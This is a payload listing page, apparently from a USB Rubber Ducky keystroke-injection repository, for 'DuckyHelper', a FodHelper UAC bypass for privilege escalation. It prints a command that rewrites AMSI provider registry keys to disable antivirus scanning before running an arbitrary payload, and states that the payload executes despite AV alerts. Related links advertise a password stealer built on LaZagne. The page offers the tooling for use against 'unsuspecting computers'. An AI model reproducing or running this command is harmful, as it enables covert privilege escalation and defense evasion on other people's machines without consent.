DuckyHelper

DuckyHelper
Download Copy
Title: DuckyHelper
Author: 0iphor13

UAC bypass for privilege escalation (Method FodHelper) AV will notify, but payload will still be executed Payload configured in line 19 & 21 (cmd.exe) : $P="cmd.exe /c powershell New-Item 'HKLM:\SOFTWARE\Microsoft\AMSI\Providers\{2781761E-28E0-4109-99FE-B9D127C57AFF}' -Force; Remove-Item -Path 'HKLM:\SOFTWARE\Microsoft\AMSI\Providers\{2781761E-28E0-4109-99FE-B9D127C57AFE}' -Recurse;[PAYLOAD]

Execution is the method of either remotely or locally running code — malicious or otherwise — on a target computer. Execution is typically coupled with other techniques to carry out more complex tasks, like performing reconnaissance, exfiltration or credential harvesting. Execution may be ephemeral, or coupled with persistence techniques used to maintain remote access or continued code execution. See all execution payloads.

This payload is for the USB Rubber Ducky — a "flash drive" that types keystroke injection payloads into unsuspecting computers at incredible speeds. It's no wonder this little quacker has made appearances on Mr. Robot, FBI, Blacklist, National Geography and more!

Submit your own payload, or browse more featured USB Rubber Ducky Payloads.

 

 

Related Payloads

Starting a PowerShell with administrator permissions in Windows 10/11
Starting a PowerShell with administrator permissions in Windows 10/11
This script can be considered by people who are new to the world of scripts written in DuckyScript so that they can unde
Read More
Change the password of the windows user
Change the password of the windows user
Through this script you will be able to change windows user's password super fast. A PowerShell with administrator perm
Read More
Everything Password Stealer
Everything Password Stealer
Steals every password in every windows 10 or 11 passwords with LaZagne. Bypasses UAC, Firewall, and Defender with persis
Read More